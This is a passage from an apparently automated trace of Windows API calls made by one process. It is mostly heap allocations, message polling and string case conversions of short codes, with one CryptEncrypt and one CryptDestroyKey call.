0x34a0080 [0190.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0190.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0190.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0190.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.289] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e3558*, pdwDataLen=0x8bef68*=0x5d75, dwBufLen=0x5d78 | out: pbData=0x24e3558*, pdwDataLen=0x8bef68*=0x5d78) returned 1 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0190.290] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0190.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.290] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.290] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.291] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0190.292] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.294] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.294] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.294] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.294] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.295] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.295] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.295] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.295] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.295] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.295] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.295] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.295] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.296] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.296] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0190.296] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.296] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0190.296] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.296] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.297] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0190.297] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.297] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.297] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.300] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.300] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.300] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.302] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.303] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.303] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0190.303] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.303] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0190.303] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.303] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.304] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.304] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.304] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.304] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.304] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.305] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.306] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0190.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0190.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.308] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.308] CharUpperBuffW (in: 